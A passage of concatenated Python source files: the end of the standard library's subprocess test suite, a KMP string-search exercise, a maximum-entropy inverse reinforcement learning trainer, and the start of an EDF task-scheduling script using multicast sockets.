self.assertEqual(subprocess.list2cmdline(['a\\"b', 'c', 'd']),
'a\\\\\\"b c d')
self.assertEqual(subprocess.list2cmdline(['a\\\\b c', 'd', 'e']),
'"a\\\\b c" d e')
self.assertEqual(subprocess.list2cmdline(['a\\\\b\\ c', 'd', 'e']),
'"a\\\\b\\ c" d e')
self.assertEqual(subprocess.list2cmdline(['ab', '']),
'ab ""')
def test_poll(self):
p = subprocess.Popen([sys.executable,
"-c", "import time; time.sleep(1)"])
count = 0
while p.poll() is None:
time.sleep(0.1)
count += 1
# We expect that the poll loop probably went around about 10 times,
# but, based on system scheduling we can't control, it's possible
# poll() never returned None. It "should be" very rare that it
# didn't go around at least twice.
self.assertGreaterEqual(count, 2)
# Subsequent invocations should just return the returncode
self.assertEqual(p.poll(), 0)
def test_wait(self):
p = subprocess.Popen([sys.executable,
"-c", "import time; time.sleep(2)"])
self.assertEqual(p.wait(), 0)
# Subsequent invocations should just return the returncode
self.assertEqual(p.wait(), 0)
def test_invalid_bufsize(self):
# an invalid type of the bufsize argument should raise
# TypeError.
with self.assertRaises(TypeError):
subprocess.Popen([sys.executable, "-c", "pass"], "orange")
def test_leaking_fds_on_error(self):
# see bug #5179: Popen leaks file descriptors to PIPEs if
# the child fails to execute; this will eventually exhaust
# the maximum number of open fds. 1024 seems a very common
# value for that limit, but Windows has 2048, so we loop
# 1024 times (each call leaked two fds).
for i in range(1024):
# Windows raises IOError. Others raise OSError.
with self.assertRaises(EnvironmentError) as c:
subprocess.Popen(['nonexisting_i_hope'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
# ignore errors that indicate the command was not found
if c.exception.errno not in (errno.ENOENT, errno.EACCES):
raise c.exception
@unittest.skipIf(threading is None, "threading required")
def test_double_close_on_error(self):
# Issue #18851
fds = []
def open_fds():
for i in range(20):
fds.extend(os.pipe())
time.sleep(0.001)
t = threading.Thread(target=open_fds)
t.start()
try:
with self.assertRaises(EnvironmentError):
subprocess.Popen(['nonexisting_i_hope'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
finally:
t.join()
exc = None
for fd in fds:
# If a double close occurred, some of those fds will
# already have been closed by mistake, and os.close()
# here will raise.
try:
os.close(fd)
except OSError as e:
exc = e
if exc is not None:
raise exc
def test_handles_closed_on_exception(self):
# If CreateProcess exits with an error, ensure the
# duplicate output handles are released
ifhandle, ifname = mkstemp()
ofhandle, ofname = mkstemp()
efhandle, efname = mkstemp()
try:
subprocess.Popen (["*"], stdin=ifhandle, stdout=ofhandle,
stderr=efhandle)
except OSError:
os.close(ifhandle)
os.remove(ifname)
os.close(ofhandle)
os.remove(ofname)
os.close(efhandle)
os.remove(efname)
self.assertFalse(os.path.exists(ifname))
self.assertFalse(os.path.exists(ofname))
self.assertFalse(os.path.exists(efname))
def test_communicate_epipe(self):
# Issue 10963: communicate() should hide EPIPE
p = subprocess.Popen([sys.executable, "-c", 'pass'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
p.communicate("x" * 2**20)
def test_communicate_epipe_only_stdin(self):
# Issue 10963: communicate() should hide EPIPE
p = subprocess.Popen([sys.executable, "-c", 'pass'],
stdin=subprocess.PIPE)
self.addCleanup(p.stdin.close)
time.sleep(2)
p.communicate("x" * 2**20)
# This test is Linux-ish specific for simplicity to at least have
# some coverage. It is not a platform specific bug.
@unittest.skipUnless(os.path.isdir('/proc/%d/fd' % os.getpid()),
"Linux specific")
def test_failed_child_execute_fd_leak(self):
"""Test for the fork() failure fd leak reported in issue16327."""
fd_directory = '/proc/%d/fd' % os.getpid()
fds_before_popen = os.listdir(fd_directory)
with self.assertRaises(PopenTestException):
PopenExecuteChildRaises(
[sys.executable, '-c', 'pass'], stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# NOTE: This test doesn't verify that the real _execute_child
# does not close the file descriptors itself on the way out
# during an exception. Code inspection has confirmed that.
fds_after_exception = os.listdir(fd_directory)
self.assertEqual(fds_before_popen, fds_after_exception)
# context manager
class _SuppressCoreFiles(object):
"""Try to prevent core files from being created."""
old_limit = None
def __enter__(self):
"""Try to save previous ulimit, then set it to (0, 0)."""
if resource is not None:
try:
self.old_limit = resource.getrlimit(resource.RLIMIT_CORE)
resource.setrlimit(resource.RLIMIT_CORE, (0, 0))
except (ValueError, resource.error):
pass
if sys.platform == 'darwin':
# Check if the 'Crash Reporter' on OSX was configured
# in 'Developer' mode and warn that it will get triggered
# when it is.
#
# This assumes that this context manager is used in tests
# that might trigger the next manager.
value = subprocess.Popen(['/usr/bin/defaults', 'read',
'com.apple.CrashReporter', 'DialogType'],
stdout=subprocess.PIPE).communicate()[0]
if value.strip() == b'developer':
print "this tests triggers the Crash Reporter, that is intentional"
sys.stdout.flush()
def __exit__(self, *args):
"""Return core file behavior to default."""
if self.old_limit is None:
return
if resource is not None:
try:
resource.setrlimit(resource.RLIMIT_CORE, self.old_limit)
except (ValueError, resource.error):
pass
@unittest.skipUnless(hasattr(signal, 'SIGALRM'),
"Requires signal.SIGALRM")
def test_communicate_eintr(self):
# Issue #12493: communicate() should handle EINTR
def handler(signum, frame):
pass
old_handler = signal.signal(signal.SIGALRM, handler)
self.addCleanup(signal.signal, signal.SIGALRM, old_handler)
# the process is running for 2 seconds
args = [sys.executable, "-c", 'import time; time.sleep(2)']
for stream in ('stdout', 'stderr'):
kw = {stream: subprocess.PIPE}
with subprocess.Popen(args, **kw) as process:
signal.alarm(1)
# communicate() will be interrupted by SIGALRM
process.communicate()
@unittest.skipIf(mswindows, "POSIX specific tests")
class POSIXProcessTestCase(BaseTestCase):
def test_exceptions(self):
# caught & re-raised exceptions
with self.assertRaises(OSError) as c:
p = subprocess.Popen([sys.executable, "-c", ""],
cwd="/this/path/does/not/exist")
# The attribute child_traceback should contain "os.chdir" somewhere.
self.assertIn("os.chdir", c.exception.child_traceback)
def test_run_abort(self):
# returncode handles signal termination
with _SuppressCoreFiles():
p = subprocess.Popen([sys.executable, "-c",
"import os; os.abort()"])
p.wait()
self.assertEqual(-p.returncode, signal.SIGABRT)
def test_preexec(self):
# preexec function
p = subprocess.Popen([sys.executable, "-c",
"import sys, os;"
"sys.stdout.write(os.getenv('FRUIT'))"],
stdout=subprocess.PIPE,
preexec_fn=lambda: os.putenv("FRUIT", "apple"))
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.read(), "apple")
class _TestExecuteChildPopen(subprocess.Popen):
"""Used to test behavior at the end of _execute_child."""
def __init__(self, testcase, *args, **kwargs):
self._testcase = testcase
subprocess.Popen.__init__(self, *args, **kwargs)
def _execute_child(
self, args, executable, preexec_fn, close_fds, cwd, env,
universal_newlines, startupinfo, creationflags, shell, to_close,
p2cread, p2cwrite,
c2pread, c2pwrite,
errread, errwrite):
try:
subprocess.Popen._execute_child(
self, args, executable, preexec_fn, close_fds,
cwd, env, universal_newlines,
startupinfo, creationflags, shell, to_close,
p2cread, p2cwrite,
c2pread, c2pwrite,
errread, errwrite)
finally:
# Open a bunch of file descriptors and verify that
# none of them are the same as the ones the Popen
# instance is using for stdin/stdout/stderr.
devzero_fds = [os.open("/dev/zero", os.O_RDONLY)
for _ in range(8)]
try:
for fd in devzero_fds:
self._testcase.assertNotIn(
fd, (p2cwrite, c2pread, errread))
finally:
for fd in devzero_fds:
os.close(fd)
@unittest.skipIf(not os.path.exists("/dev/zero"), "/dev/zero required.")
def test_preexec_errpipe_does_not_double_close_pipes(self):
"""Issue16140: Don't double close pipes on preexec error."""
def raise_it():
raise RuntimeError("force the _execute_child() errpipe_data path.")
with self.assertRaises(RuntimeError):
self._TestExecuteChildPopen(
self, [sys.executable, "-c", "pass"],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, preexec_fn=raise_it)
def test_args_string(self):
# args is a string
f, fname = mkstemp()
os.write(f, "#!/bin/sh\n")
os.write(f, "exec '%s' -c 'import sys; sys.exit(47)'\n" %
sys.executable)
os.close(f)
os.chmod(fname, 0o700)
p = subprocess.Popen(fname)
p.wait()
os.remove(fname)
self.assertEqual(p.returncode, 47)
def test_invalid_args(self):
# invalid arguments should raise ValueError
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
startupinfo=47)
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
creationflags=47)
def test_shell_sequence(self):
# Run command through the shell (sequence)
newenv = os.environ.copy()
newenv["FRUIT"] = "apple"
p = subprocess.Popen(["echo $FRUIT"], shell=1,
stdout=subprocess.PIPE,
env=newenv)
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.read().strip(), "apple")
def test_shell_string(self):
# Run command through the shell (string)
newenv = os.environ.copy()
newenv["FRUIT"] = "apple"
p = subprocess.Popen("echo $FRUIT", shell=1,
stdout=subprocess.PIPE,
env=newenv)
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.read().strip(), "apple")
def test_call_string(self):
# call() function with string argument on UNIX
f, fname = mkstemp()
os.write(f, "#!/bin/sh\n")
os.write(f, "exec '%s' -c 'import sys; sys.exit(47)'\n" %
sys.executable)
os.close(f)
os.chmod(fname, 0700)
rc = subprocess.call(fname)
os.remove(fname)
self.assertEqual(rc, 47)
def test_specific_shell(self):
# Issue #9265: Incorrect name passed as arg[0].
shells = []
for prefix in ['/bin', '/usr/bin/', '/usr/local/bin']:
for name in ['bash', 'ksh']:
sh = os.path.join(prefix, name)
if os.path.isfile(sh):
shells.append(sh)
if not shells: # Will probably work for any shell but csh.
self.skipTest("bash or ksh required for this test")
sh = '/bin/sh'
if os.path.isfile(sh) and not os.path.islink(sh):
# Test will fail if /bin/sh is a symlink to csh.
shells.append(sh)
for sh in shells:
p = subprocess.Popen("echo $0", executable=sh, shell=True,
stdout=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.read().strip(), sh)
def _kill_process(self, method, *args):
# Do not inherit file handles from the parent.
# It should fix failures on some platforms.
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
time.sleep(30)
"""],
close_fds=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
getattr(p, method)(*args)
return p
@unittest.skipIf(sys.platform.startswith(('netbsd', 'openbsd')),
"Due to known OS bug (issue #16762)")
def _kill_dead_process(self, method, *args):
# Do not inherit file handles from the parent.
# It should fix failures on some platforms.
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
"""],
close_fds=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
# The process should end after this
time.sleep(1)
# This shouldn't raise even though the child is now dead
getattr(p, method)(*args)
p.communicate()
def test_send_signal(self):
p = self._kill_process('send_signal', signal.SIGINT)
_, stderr = p.communicate()
self.assertIn('KeyboardInterrupt', stderr)
self.assertNotEqual(p.wait(), 0)
def test_kill(self):
p = self._kill_process('kill')
_, stderr = p.communicate()
self.assertStderrEqual(stderr, '')
self.assertEqual(p.wait(), -signal.SIGKILL)
def test_terminate(self):
p = self._kill_process('terminate')
_, stderr = p.communicate()
self.assertStderrEqual(stderr, '')
self.assertEqual(p.wait(), -signal.SIGTERM)
def test_send_signal_dead(self):
# Sending a signal to a dead process
self._kill_dead_process('send_signal', signal.SIGINT)
def test_kill_dead(self):
# Killing a dead process
self._kill_dead_process('kill')
def test_terminate_dead(self):
# Terminating a dead process
self._kill_dead_process('terminate')
def check_close_std_fds(self, fds):
# Issue #9905: test that subprocess pipes still work properly with
# some standard fds closed
stdin = 0
newfds = []
for a in fds:
b = os.dup(a)
newfds.append(b)
if a == 0:
stdin = b
try:
for fd in fds:
os.close(fd)
out, err = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdin=stdin,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE).communicate()
err = test_support.strip_python_stderr(err)
self.assertEqual((out, err), (b'apple', b'orange'))
finally:
for b, a in zip(newfds, fds):
os.dup2(b, a)
for b in newfds:
os.close(b)
def test_close_fd_0(self):
self.check_close_std_fds([0])
def test_close_fd_1(self):
self.check_close_std_fds([1])
def test_close_fd_2(self):
self.check_close_std_fds([2])
def test_close_fds_0_1(self):
self.check_close_std_fds([0, 1])
def test_close_fds_0_2(self):
self.check_close_std_fds([0, 2])
def test_close_fds_1_2(self):
self.check_close_std_fds([1, 2])
def test_close_fds_0_1_2(self):
# Issue #10806: test that subprocess pipes still work properly with
# all standard fds closed.
self.check_close_std_fds([0, 1, 2])
def check_swap_fds(self, stdin_no, stdout_no, stderr_no):
# open up some temporary files
temps = [mkstemp() for i in range(3)]
temp_fds = [fd for fd, fname in temps]
try:
# unlink the files -- we won't need to reopen them
for fd, fname in temps:
os.unlink(fname)
# save a copy of the standard file descriptors
saved_fds = [os.dup(fd) for fd in range(3)]
try:
# duplicate the temp files over the standard fd's 0, 1, 2
for fd, temp_fd in enumerate(temp_fds):
os.dup2(temp_fd, fd)
# write some data to what will become stdin, and rewind
os.write(stdin_no, b"STDIN")
os.lseek(stdin_no, 0, 0)
# now use those files in the given order, so that subprocess
# has to rearrange them in the child
p = subprocess.Popen([sys.executable, "-c",
'import sys; got = sys.stdin.read();'
'sys.stdout.write("got %s"%got); sys.stderr.write("err")'],
stdin=stdin_no,
stdout=stdout_no,
stderr=stderr_no)
p.wait()
for fd in temp_fds:
os.lseek(fd, 0, 0)
out = os.read(stdout_no, 1024)
err = test_support.strip_python_stderr(os.read(stderr_no, 1024))
finally:
for std, saved in enumerate(saved_fds):
os.dup2(saved, std)
os.close(saved)
self.assertEqual(out, b"got STDIN")
self.assertEqual(err, b"err")
finally:
for fd in temp_fds:
os.close(fd)
# When duping fds, if there arises a situation where one of the fds is
# either 0, 1 or 2, it is possible that it is overwritten (#12607).
# This tests all combinations of this.
def test_swap_fds(self):
self.check_swap_fds(0, 1, 2)
self.check_swap_fds(0, 2, 1)
self.check_swap_fds(1, 0, 2)
self.check_swap_fds(1, 2, 0)
self.check_swap_fds(2, 0, 1)
self.check_swap_fds(2, 1, 0)
def test_wait_when_sigchild_ignored(self):
# NOTE: sigchild_ignore.py may not be an effective test on all OSes.
sigchild_ignore = test_support.findfile("sigchild_ignore.py",
subdir="subprocessdata")
p = subprocess.Popen([sys.executable, sigchild_ignore],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
self.assertEqual(0, p.returncode, "sigchild_ignore.py exited"
" non-zero with this error:\n%s" % stderr)
def test_zombie_fast_process_del(self):
# Issue #12650: on Unix, if Popen.__del__() was called before the
# process exited, it wouldn't be added to subprocess._active, and would
# remain a zombie.
# spawn a Popen, and delete its reference before it exits
p = subprocess.Popen([sys.executable, "-c",
'import sys, time;'
'time.sleep(0.2)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
ident = id(p)
pid = p.pid
del p
test_support.gc_collect()
# check that p is in the active processes list
self.assertIn(ident, [id(o) for o in subprocess._active])
def test_leak_fast_process_del_killed(self):
# Issue #12650: on Unix, if Popen.__del__() was called before the
# process exited, and the process got killed by a signal, it would never
# be removed from subprocess._active, which triggered a FD and memory
# leak.
# spawn a Popen, delete its reference and kill it
p = subprocess.Popen([sys.executable, "-c",
'import time;'
'time.sleep(3)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
ident = id(p)
pid = p.pid
del p
test_support.gc_collect()
os.kill(pid, signal.SIGKILL)
# check that p is in the active processes list
self.assertIn(ident, [id(o) for o in subprocess._active])
# let some time for the process to exit, and create a new Popen: this
# should trigger the wait() of p
time.sleep(0.2)
with self.assertRaises(EnvironmentError) as c:
with subprocess.Popen(['nonexisting_i_hope'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
pass
# p should have been wait()ed on, and removed from the _active list
self.assertRaises(OSError, os.waitpid, pid, 0)
self.assertNotIn(ident, [id(o) for o in subprocess._active])
def test_pipe_cloexec(self):
# Issue 12786: check that the communication pipes' FDs are set CLOEXEC,
# and are not inherited by another child process.
p1 = subprocess.Popen([sys.executable, "-c",
'import os;'
'os.read(0, 1)'
],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
p2 = subprocess.Popen([sys.executable, "-c", """if True:
import os, errno, sys
for fd in %r:
try:
os.close(fd)
except OSError as e:
if e.errno != errno.EBADF:
raise
else:
sys.exit(1)
sys.exit(0)
""" % [f.fileno() for f in (p1.stdin, p1.stdout,
p1.stderr)]
],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, close_fds=False)
p1.communicate('foo')
_, stderr = p2.communicate()
self.assertEqual(p2.returncode, 0, "Unexpected error: " + repr(stderr))
@unittest.skipUnless(mswindows, "Windows specific tests")
class Win32ProcessTestCase(BaseTestCase):
def test_startupinfo(self):
# startupinfo argument
# We uses hardcoded constants, because we do not want to
# depend on win32all.
STARTF_USESHOWWINDOW = 1
SW_MAXIMIZE = 3
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags = STARTF_USESHOWWINDOW
startupinfo.wShowWindow = SW_MAXIMIZE
# Since Python is a console process, it won't be affected
# by wShowWindow, but the argument should be silently
# ignored
subprocess.call([sys.executable, "-c", "import sys; sys.exit(0)"],
startupinfo=startupinfo)
def test_creationflags(self):
# creationflags argument
CREATE_NEW_CONSOLE = 16
sys.stderr.write(" a DOS box should flash briefly ...\n")
subprocess.call(sys.executable +
' -c "import time; time.sleep(0.25)"',
creationflags=CREATE_NEW_CONSOLE)
def test_invalid_args(self):
# invalid arguments should raise ValueError
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
preexec_fn=lambda: 1)
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
stdout=subprocess.PIPE,
close_fds=True)
def test_close_fds(self):
# close file descriptors
rc = subprocess.call([sys.executable, "-c",
"import sys; sys.exit(47)"],
close_fds=True)
self.assertEqual(rc, 47)
def test_shell_sequence(self):
# Run command through the shell (sequence)
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen(["set"], shell=1,
stdout=subprocess.PIPE,
env=newenv)
self.addCleanup(p.stdout.close)
self.assertIn("physalis", p.stdout.read())
def test_shell_string(self):
# Run command through the shell (string)
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen("set", shell=1,
stdout=subprocess.PIPE,
env=newenv)
self.addCleanup(p.stdout.close)
self.assertIn("physalis", p.stdout.read())
def test_call_string(self):
# call() function with string argument on Windows
rc = subprocess.call(sys.executable +
' -c "import sys; sys.exit(47)"')
self.assertEqual(rc, 47)
def _kill_process(self, method, *args):
# Some win32 buildbot raises EOFError if stdin is inherited
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
time.sleep(30)
"""],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
getattr(p, method)(*args)
_, stderr = p.communicate()
self.assertStderrEqual(stderr, '')
returncode = p.wait()
self.assertNotEqual(returncode, 0)
def _kill_dead_process(self, method, *args):
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
sys.exit(42)
"""],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
# The process should end after this
time.sleep(1)
# This shouldn't raise even though the child is now dead
getattr(p, method)(*args)
_, stderr = p.communicate()
self.assertStderrEqual(stderr, b'')
rc = p.wait()
self.assertEqual(rc, 42)
def test_send_signal(self):
self._kill_process('send_signal', signal.SIGTERM)
def test_kill(self):
self._kill_process('kill')
def test_terminate(self):
self._kill_process('terminate')
def test_send_signal_dead(self):
self._kill_dead_process('send_signal', signal.SIGTERM)
def test_kill_dead(self):
self._kill_dead_process('kill')
def test_terminate_dead(self):
self._kill_dead_process('terminate')
@unittest.skipUnless(getattr(subprocess, '_has_poll', False),
"poll system call not supported")
class ProcessTestCaseNoPoll(ProcessTestCase):
def setUp(self):
subprocess._has_poll = False
ProcessTestCase.setUp(self)
def tearDown(self):
subprocess._has_poll = True
ProcessTestCase.tearDown(self)
class HelperFunctionTests(unittest.TestCase):
@unittest.skipIf(mswindows, "errno and EINTR make no sense on windows")
def test_eintr_retry_call(self):
record_calls = []
def fake_os_func(*args):
record_calls.append(args)
if len(record_calls) == 2:
raise OSError(errno.EINTR, "fake interrupted system call")
return tuple(reversed(args))
self.assertEqual((999, 256),
subprocess._eintr_retry_call(fake_os_func, 256, 999))
self.assertEqual([(256, 999)], record_calls)
# This time there will be an EINTR so it will loop once.
self.assertEqual((666,),
subprocess._eintr_retry_call(fake_os_func, 666))
self.assertEqual([(256, 999), (666,), (666,)], record_calls)
@unittest.skipUnless(mswindows, "mswindows only")
class CommandsWithSpaces (BaseTestCase):
def setUp(self):
super(CommandsWithSpaces, self).setUp()
f, fname = mkstemp(".py", "te st")
self.fname = fname.lower ()
os.write(f, b"import sys;"
b"sys.stdout.write('%d %s' % (len(sys.argv), [a.lower () for a in sys.argv]))"
)
os.close(f)
def tearDown(self):
os.remove(self.fname)
super(CommandsWithSpaces, self).tearDown()
def with_spaces(self, *args, **kwargs):
kwargs['stdout'] = subprocess.PIPE
p = subprocess.Popen(*args, **kwargs)
self.addCleanup(p.stdout.close)
self.assertEqual(
p.stdout.read ().decode("mbcs"),
"2 [%r, 'ab cd']" % self.fname
)
def test_shell_string_with_spaces(self):
# call() function with string argument with spaces on Windows
self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname,
"ab cd"), shell=1)
def test_shell_sequence_with_spaces(self):
# call() function with sequence argument with spaces on Windows
self.with_spaces([sys.executable, self.fname, "ab cd"], shell=1)
def test_noshell_string_with_spaces(self):
# call() function with string argument with spaces on Windows
self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname,
"ab cd"))
def test_noshell_sequence_with_spaces(self):
# call() function with sequence argument with spaces on Windows
self.with_spaces([sys.executable, self.fname, "ab cd"])
def test_main():
unit_tests = (ProcessTestCase,
POSIXProcessTestCase,
Win32ProcessTestCase,
ProcessTestCaseNoPoll,
HelperFunctionTests,
CommandsWithSpaces)
test_support.run_unittest(*unit_tests)
test_support.reap_children()
if __name__ == "__main__":
test_main()
|
lab13_b.py | from sys import setrecursionlimit
import threading
setrecursionlimit(10 ** 9)
threading.stack_size(3 * 67108864)
def main(): #Knuth_Morris_Pratt
file_input, file_output = open("search2.in", 'r'), open("search2.out", 'w')
def get_prefix(string : str) -> list:
prefix = [0] + [None for _ in range(len(string) - 1)]
for i in range(1, len(string)):
temp = prefix[i - 1]
while temp > 0 and string[i] != string[temp]:
temp = prefix[temp - 1]
if string[i] == string[temp]: temp += 1
prefix[i] = temp
return prefix
pattern, string = file_input.readline().strip(), file_input.readline().strip()
pattern_len, data_len = len(pattern), len(string)
prefix = get_prefix(pattern + "$" + string)
found_indexes = []
for i in range(pattern_len, pattern_len + data_len + 1):
if prefix[i] == pattern_len: found_indexes.append(i - pattern_len * 2 + 1)
print(len(found_indexes), file=file_output)
print(*found_indexes, file=file_output)
file_output.close()
thread = threading.Thread(target=main)
thread.start() |
train.py | # -*- coding: utf-8 -*-
##############################################################
# train.py
# Copyright (C) 2018 Tsubasa Hirakawa. All rights reserved.
##############################################################
import os
import time
import math
import numpy as np
import multiprocessing as mp
from MaxEntIRL import MaxEntIRL
from util import chunk_list, read_text
BASE_FILE = "./data/basename.txt"
TRAJECTORY_PATH = "./data/tracking"
FEATURE_MAP_FILE = "./data/feature_map/feature_map_3d.npy"
IMAGE_FILE = "./data/image/image2.png"
RESULT_DIR = "./RESULT"
CACHE_DIR = "./CACHE"
class Trainer:
def __init__(self, input_basename_list):
self.FLOAT_MAX = 1e30
self.FLOAT_MIN = 1e-30
self.n_cpu = mp.cpu_count()
self.basename_list = input_basename_list
self.split_base_list = chunk_list(self.basename_list, (len(self.basename_list) / self.n_cpu) + 1)
self.n_feature = np.load(FEATURE_MAP_FILE).shape[0]
self.n_data = len(input_basename_list)
self.w = np.ones(self.n_feature, dtype=np.float32) * 0.5
self.w_best = []
# empirical feature count
self.f_empirical = np.zeros(self.n_feature, dtype=np.float32)
self.f_expected = np.zeros(self.n_feature, dtype=np.float32)
self.f_gradient = np.zeros(self.n_feature, dtype=np.float32)
self.f_gradient_best = []
self.loglikelihood = 0.0
self.min_loglikelihood = -self.FLOAT_MAX
self.lam = 0.01
self.DELTA = 0.01
self.converged = False
self.pid = os.getpid()
# compute empirical feature count
for bname in self.basename_list:
tmp_model = MaxEntIRL()
tmp_model.load_trajectory(os.path.join(TRAJECTORY_PATH, bname + ".npy"))
tmp_model.update_weight(self.w)
tmp_model.load_features(FEATURE_MAP_FILE)
tmp_model.load_image(IMAGE_FILE)
self.f_empirical += tmp_model.compute_empirical_feature_count()
self.f_empirical /= self.n_feature
print("empirical feature count:", self.f_empirical)
# make cache directory
if not os.path.exists(CACHE_DIR):
os.mkdir(CACHE_DIR)
def backward_forward_pass(self):
thread = []
for th_i, b_list in enumerate(self.split_base_list):
thread.append(mp.Process(target=self.back_forward_single_thread, args=(b_list, self.w, th_i)))
for t in thread:
t.start()
for t in thread:
t.join()
self.loglikelihood = 0.0
self.f_expected *= 0.0
for th_i, t in enumerate(thread):
ll_tmp = np.load(os.path.join(CACHE_DIR, "%d-%d-ll.npy" % (self.pid, th_i)))
f_exp_tmp = np.load(os.path.join(CACHE_DIR, "%d-%d-fexp.npy" % (self.pid, th_i)))
self.loglikelihood += np.sum(ll_tmp)
self.f_expected += np.sum(f_exp_tmp, axis=0)
self.loglikelihood /= float(self.n_data)
self.f_expected /= float(self.n_data)
def back_forward_single_thread(self, basename, weight, thread_index):
loglikelihood_tmp = []
f_expected_list = []
for bn in basename:
print(bn)
_start = time.time()
model = MaxEntIRL()
model.load_trajectory(os.path.join(TRAJECTORY_PATH, bn + ".npy"))
model.update_weight(weight)
model.load_features(FEATURE_MAP_FILE)
model.load_image(IMAGE_FILE)
model.compute_reward()
model.compute_soft_value_function()
model.compute_policy()
model.compute_forecast_distribution()
loglikelihood_tmp.append(model.compute_trajectory_likelihood())
f_expected_list.append(model.accumulate_expected_feature_count())
_end = time.time()
print("done. time", _end - _start)
# save
np.save(os.path.join(CACHE_DIR, "%d-%d-ll.npy" % (self.pid, thread_index)), np.array(loglikelihood_tmp))
np.save(os.path.join(CACHE_DIR, "%d-%d-fexp.npy" % (self.pid, thread_index)), np.array(f_expected_list))
def gradient_update(self):
improvement = self.loglikelihood - self.min_loglikelihood
if improvement > self.DELTA:
self.min_loglikelihood = self.loglikelihood
elif -self.DELTA < improvement < self.DELTA:
improvement = 0
print("improved by", improvement)
# update parameters
if improvement < 0:
print("NO IMPROVEMENT: decrease step size and redo")
self.lam = self.lam * 0.5
for f in range(self.n_feature):
self.w[f] = self.w_best[f] * math.exp(self.lam * self.f_gradient[f])
elif improvement > 0:
print("IMPROVEMENT: increase step size")
self.w_best = self.w.copy()
self.lam = self.lam * 2.0
for f in range(self.n_feature):
self.f_gradient[f] = self.f_empirical[f] - self.f_expected[f]
for f in range(self.n_feature):
self.w[f] = self.w_best[f] * math.exp(self.lam * self.f_gradient[f])
elif improvement == 0:
print("CONVERGED")
self.converged = True
print("lambda:", self.lam)
print("f_empirical:", self.f_empirical)
print("f_expected:", self.f_expected)
def save_parameter(self, output_filename):
np.savetxt(output_filename, self.w)
if __name__ == '__main__':
if not os.path.exists(RESULT_DIR):
os.mkdir(RESULT_DIR)
basename_list = read_text(BASE_FILE)
trainer = Trainer(basename_list)
iteration = 0
while not trainer.converged:
start = time.time()
trainer.backward_forward_pass()
trainer.gradient_update()
trainer.save_parameter(os.path.join(RESULT_DIR, "weight-%03d.txt" % iteration))
iteration += 1
end = time.time()
print("time of this iteration:", end - start, "s")
trainer.save_parameter(os.path.join(RESULT_DIR, "weight.txt"))
print("train: done.")
|
12_edf_wound_wait_gui.py | from functools import reduce
from sys import *
import numpy as np
import random as r
import ping_code as pc
import socket
import struct
import subprocess as sp
from threading import Thread
import paramiko
import ast
import time
import os
import getpass as gp
import psutil
from drawnow import *
from matplotlib import pyplot as plt
import data
hosts = {} # {hostname: ip}
multicast_group = '224.3.29.71'
server_address = ('', 10000)
# Create the socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Bind to the server address
sock.bind(server_address)
# Tell the operating system to add the socket to the multicast group
# on all interfaces.
group = socket.inet_aton(multicast_group)
mreq = struct.pack('4sL', group, socket.INADDR_ANY)
sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
_tasks = {'t1': {'wcet': 3, 'period': 20, 'deadline': 15},
